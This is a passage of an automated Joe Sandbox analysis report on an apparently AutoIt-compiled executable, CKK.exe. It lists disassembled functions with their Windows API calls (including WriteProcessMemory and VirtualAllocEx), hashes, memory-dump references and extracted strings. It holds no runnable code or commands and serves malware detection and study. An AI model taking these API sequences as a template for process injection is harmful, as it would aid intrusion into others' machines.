                                                                                              • Opcode Fuzzy Hash: 5594975a53a501adf8dd66bfd9e5491bb54d8fafd517f0decdf3e0ca6e04fe9a
                                                                                              • Instruction Fuzzy Hash: 9C014279600605BFDB118BA4EC89A6A3B6EFF893A5B210468FA41C6260DB31DC018F70
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A50FCA
                                                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A50FD6
                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A50FE5
                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A50FEC
                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A51002
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                              • String ID:
                                                                                              • API String ID: 44706859-0
                                                                                              • Opcode ID: 3cb232d4e3ee6b7da27d717b3d244386375a7a5d1ceddf844af987b2a28c0ec9
                                                                                              • Instruction ID: 6555546aeadf6e67eefe4ed178dd22b27db900f95a6bd35fdef28817a5c17a55
                                                                                              • Opcode Fuzzy Hash: 3cb232d4e3ee6b7da27d717b3d244386375a7a5d1ceddf844af987b2a28c0ec9
                                                                                              • Instruction Fuzzy Hash: 50F04935201311ABDB218FE4AC8DF663BADFF89762F504424FA46CA291CA70DC418F70
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A5102A
                                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A51036
                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A51045
                                                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A5104C
                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A51062
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                              • String ID:
                                                                                              • API String ID: 44706859-0
                                                                                              • Opcode ID: d86f0a832f5136a78e5d4cde42d3b6c4e1ee1d4735ec0186b283405949e198c5
                                                                                              • Instruction ID: 5f49380c973f61a4cb39dba79d648ac51b7829e71aea6cb3cf2816d5394f78f1
                                                                                              • Opcode Fuzzy Hash: d86f0a832f5136a78e5d4cde42d3b6c4e1ee1d4735ec0186b283405949e198c5
                                                                                              • Instruction Fuzzy Hash: EBF04935200311ABDB219FE4EC89F663BADFF89762F600424FA45CA290CA70D8418F70
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2962429428-0
                                                                                              • Opcode ID: 8635955aa65b08e81bf1b72e8c13b635a5335458b04b87d1284b146d0a5f1b8a
                                                                                              • Instruction ID: 091a529bfe2460fb3cec36a274892c407999aaa94425d9ef3e0f6bc6edbf40ff
                                                                                              • Opcode Fuzzy Hash: 8635955aa65b08e81bf1b72e8c13b635a5335458b04b87d1284b146d0a5f1b8a
                                                                                              • Instruction Fuzzy Hash: E0019072800B159FC7319F66D880813F7F5FE502163158A3ED19656A31C371A995DF80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00A2D752
                                                                                                • Part of subcall function 00A229C8: HeapFree.KERNEL32(00000000,00000000), ref: 00A229DE
                                                                                                • Part of subcall function 00A229C8: GetLastError.KERNEL32(00000000,?,00A2D7D1,00000000,00000000,00000000,00000000,?,00A2D7F8,00000000,00000007,00000000,?,00A2DBF5,00000000,00000000), ref: 00A229F0
                                                                                              • _free.LIBCMT ref: 00A2D764
                                                                                              • _free.LIBCMT ref: 00A2D776
                                                                                              • _free.LIBCMT ref: 00A2D788
                                                                                              • _free.LIBCMT ref: 00A2D79A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 30ccba42d501422aaa616afda76aac9190175f35e23b9a3e466c524f256fc02e
                                                                                              • Instruction ID: 92544fd284a8280ce8d302b19f92848f3341dcb869a8c86470b6012135e6e82a
                                                                                              • Opcode Fuzzy Hash: 30ccba42d501422aaa616afda76aac9190175f35e23b9a3e466c524f256fc02e
                                                                                              • Instruction Fuzzy Hash: 52F0FF32544224ABD625EBACFAC5D1677DDBB487207E40D25F048E7513C724FC808764
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00A222BE
                                                                                                • Part of subcall function 00A229C8: HeapFree.KERNEL32(00000000,00000000), ref: 00A229DE
                                                                                                • Part of subcall function 00A229C8: GetLastError.KERNEL32(00000000,?,00A2D7D1,00000000,00000000,00000000,00000000,?,00A2D7F8,00000000,00000007,00000000,?,00A2DBF5,00000000,00000000), ref: 00A229F0
                                                                                              • _free.LIBCMT ref: 00A222D0
                                                                                              • _free.LIBCMT ref: 00A222E3
                                                                                              • _free.LIBCMT ref: 00A222F4
                                                                                              • _free.LIBCMT ref: 00A22305
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: c4f4b1e467b845c1e71c723a0ae911a0aca216af8dd96038d365554046e4a9d0
                                                                                              • Instruction ID: 21ec0c33b217910eb1faf0742a8417ceaab6870eaed6fbb4864b3cb33298258f
                                                                                              • Opcode Fuzzy Hash: c4f4b1e467b845c1e71c723a0ae911a0aca216af8dd96038d365554046e4a9d0
                                                                                              • Instruction Fuzzy Hash: 63F03A74900131EBC612EFDCBD01E883B68FB59761B42066AF420D22B2C7350893AFE4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                              • String ID:
                                                                                              • API String ID: 2625713937-0
                                                                                              • Opcode ID: 18165a91bba3fd86ce3b2e298ac44aae49b9fe7c891b1f06c04a2aa3f45f7691
                                                                                              • Instruction ID: 454203ce91b403d417e24de5b0a8b45b39a194d31ac06e5a377897beaecf2af6
                                                                                              • Opcode Fuzzy Hash: 18165a91bba3fd86ce3b2e298ac44aae49b9fe7c891b1f06c04a2aa3f45f7691
                                                                                              • Instruction Fuzzy Hash: 5CF01438106608EBDB62DFA9ED1CB653B71AB02372F448214F425590F2C73189A6DF20
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: __freea$_free
                                                                                              • String ID: a/p$am/pm
                                                                                              • API String ID: 3432400110-3206640213
                                                                                              • Opcode ID: 4aa9dfbf951fab10f327d6af75a7079de5d0c4bb733a8c5dbc4a94729e9ceb40
                                                                                              • Instruction ID: 1cf9775c15e556b9369f8bc5550d728e30f149c08d16750617202f65f0c25249
                                                                                              • Opcode Fuzzy Hash: 4aa9dfbf951fab10f327d6af75a7079de5d0c4bb733a8c5dbc4a94729e9ceb40
                                                                                              • Instruction Fuzzy Hash: 90D10231900226DACB68DF6CE945BFAB7B2FF25310F280279E9019F651D3759D81CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A10242: EnterCriticalSection.KERNEL32(00AC070C,00AC1884,?,?,00A0198B,00AC2518,?,?,?,009F12F9,00000000), ref: 00A1024D
                                                                                                • Part of subcall function 00A10242: LeaveCriticalSection.KERNEL32(00AC070C,?,00A0198B,00AC2518,?,?,?,009F12F9,00000000), ref: 00A1028A
                                                                                                • Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD
                                                                                                • Part of subcall function 00A100A3: __onexit.LIBCMT ref: 00A100A9
                                                                                              • __Init_thread_footer.LIBCMT ref: 00A77BFB
                                                                                                • Part of subcall function 00A101F8: EnterCriticalSection.KERNEL32(00AC070C,?,?,00A08747,00AC2514), ref: 00A10202
                                                                                                • Part of subcall function 00A101F8: LeaveCriticalSection.KERNEL32(00AC070C,?,00A08747,00AC2514), ref: 00A10235
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                              • String ID: 5$G$Variable must be of type 'Object'.
                                                                                              • API String ID: 535116098-3733170431
                                                                                              • Opcode ID: f53da8953fd19e861d2df6ffdca806f4a95665c2bff85fb334d3af86499274a4
                                                                                              • Instruction ID: 9ec42cc8b2eb7629daaab900656076182ce0a9e0545d0bec7c67690ea4ab28d5
                                                                                              • Opcode Fuzzy Hash: f53da8953fd19e861d2df6ffdca806f4a95665c2bff85fb334d3af86499274a4
                                                                                              • Instruction Fuzzy Hash: 70916871A04209AFCB14EF94D991EBDB7B1FF48300F10C459F90AAB292DB71AE81CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A5B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A521D0,?,?,00000034,00000800,?,00000034), ref: 00A5B42D
                                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00A52760
                                                                                                • Part of subcall function 00A5B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A521FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00A5B3F8
                                                                                                • Part of subcall function 00A5B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00A5B355
                                                                                                • Part of subcall function 00A5B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00A52194,00000034,?,?,00001004,00000000,00000000), ref: 00A5B365
                                                                                                • Part of subcall function 00A5B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00A52194,00000034,?,?,00001004,00000000,00000000), ref: 00A5B37B
                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A527CD
                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A5281A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                              • String ID: @
                                                                                              • API String ID: 4150878124-2766056989
                                                                                              • Opcode ID: d321fe6512fbb0ac1bc020f3916449165cceeb6480663d628292045e09d6bd85
                                                                                              • Instruction ID: c4f51c6de0789dd749871a8d6059428f2454953b05609678fde1344613e14993
                                                                                              • Opcode Fuzzy Hash: d321fe6512fbb0ac1bc020f3916449165cceeb6480663d628292045e09d6bd85
                                                                                              • Instruction Fuzzy Hash: 3A411A72900218AFDB10DFA4CD85BEEBBB8BF09711F104099FA55B7181DB706E49CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\CKK.exe,00000104), ref: 00A21769
                                                                                              • _free.LIBCMT ref: 00A21834
                                                                                              • _free.LIBCMT ref: 00A2183E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$FileModuleName
                                                                                              • String ID: C:\Users\user\AppData\Roaming\CKK.exe
                                                                                              • API String ID: 2506810119-112244442
                                                                                              • Opcode ID: d8196b133ad34b99ac051c20da02da2aaf030a37183dd8db8ee1cfc1f7a7ae71
                                                                                              • Instruction ID: d81050278c7df26b0e1c208f2068cf69ed5ff50d3f0b0ebe7a543113e4df0c15
                                                                                              • Opcode Fuzzy Hash: d8196b133ad34b99ac051c20da02da2aaf030a37183dd8db8ee1cfc1f7a7ae71
                                                                                              • Instruction Fuzzy Hash: 1D315D75A00268EFDB21DF9DA985D9EBBFCEBA5310B154176F80497211D6708E41CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Delete$InfoItem
                                                                                              • String ID: 0
                                                                                              • API String ID: 135850232-4108050209
                                                                                              • Opcode ID: e6c9d4a8cc17450b779798becd7f29fd7584279c9cd9f2e55214532fa01e2aff
                                                                                              • Instruction ID: 1cb348092514080d31b3b518f95130dcdd0bce403e4ed8cd1ff490d318780374
                                                                                              • Opcode Fuzzy Hash: e6c9d4a8cc17450b779798becd7f29fd7584279c9cd9f2e55214532fa01e2aff
                                                                                              • Instruction Fuzzy Hash: 1641A0712043059FD724DF24D884B5ABBE4BF85332F10861DFDA59B295D770E908CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A844AA
                                                                                              • GetWindowLongW.USER32 ref: 00A844C7
                                                                                              • SetWindowLongW.USER32 ref: 00A844D7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long
                                                                                              • String ID: SysTreeView32
                                                                                              • API String ID: 847901565-1698111956
                                                                                              • Opcode ID: 6ed57b0faa2221b2b94a6d07dac69c38628a480e61c17c1714ab17e58a5c6686
                                                                                              • Instruction ID: 2fe2b14614905445fb92166cfc064283d7a8c0b7fa3d4f3d3386b2cb8630bd19
                                                                                              • Opcode Fuzzy Hash: 6ed57b0faa2221b2b94a6d07dac69c38628a480e61c17c1714ab17e58a5c6686
                                                                                              • Instruction Fuzzy Hash: 5C31C031210206AFDF24AF78DC45BEA7BA9EB08334F204725F979921E1DB70EC519B60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A7335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00A73077,?,?), ref: 00A73378
                                                                                              • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A7307A
                                                                                              • _wcslen.LIBCMT ref: 00A7309B
                                                                                              • htons.WSOCK32(00000000,?,?,00000000), ref: 00A73106
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                              • String ID: 255.255.255.255
                                                                                              • API String ID: 946324512-2422070025
                                                                                              • Opcode ID: 8dd50f31662e7378176c511d121b69c4719847a1b5e8fc3bc6796d12b472af15
                                                                                              • Instruction ID: 14a289a72119b8ead8102e43671e3af465772a8be4fc6d3a8700417257ca6bc4
                                                                                              • Opcode Fuzzy Hash: 8dd50f31662e7378176c511d121b69c4719847a1b5e8fc3bc6796d12b472af15
                                                                                              • Instruction Fuzzy Hash: 9331B23A6002059FCF10CF68C985EA977E0EF54314F66C159E9198B392D731DE42D760
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00A84705
                                                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00A84713
                                                                                              • DestroyWindow.USER32 ref: 00A8471A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$DestroyWindow
                                                                                              • String ID: msctls_updown32
                                                                                              • API String ID: 4014797782-2298589950
                                                                                              • Opcode ID: 2a3ebc4df96b0cad20bd00338ff8d7a53824541b8f74cbb8db72c66960c6321a
                                                                                              • Instruction ID: e18de6ceccd5243d0352ac677ad4888ba446fbd8a8c2fbc1f3aad1dee92a084d
                                                                                              • Opcode Fuzzy Hash: 2a3ebc4df96b0cad20bd00338ff8d7a53824541b8f74cbb8db72c66960c6321a
                                                                                              • Instruction Fuzzy Hash: 0B2130B5600209AFEB10EF64DCC1DB737ADEF9A3A8B150459FA009B251DB71EC52CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                              • API String ID: 176396367-2734436370
                                                                                              • Opcode ID: f7a45d7da1f0ba080141ceec833e72ec76510e6efdbe163547663f0197a60cc1
                                                                                              • Instruction ID: 8f96d30afad5ae9345d2266dc0bc1199aa06db3416976f8d62866fe9bdd2931d
                                                                                              • Opcode Fuzzy Hash: f7a45d7da1f0ba080141ceec833e72ec76510e6efdbe163547663f0197a60cc1
                                                                                              • Instruction Fuzzy Hash: 01216832204211AAD731BB24DD02FB7B3A8BFA0311F404426FD499F481EB749D9DC391
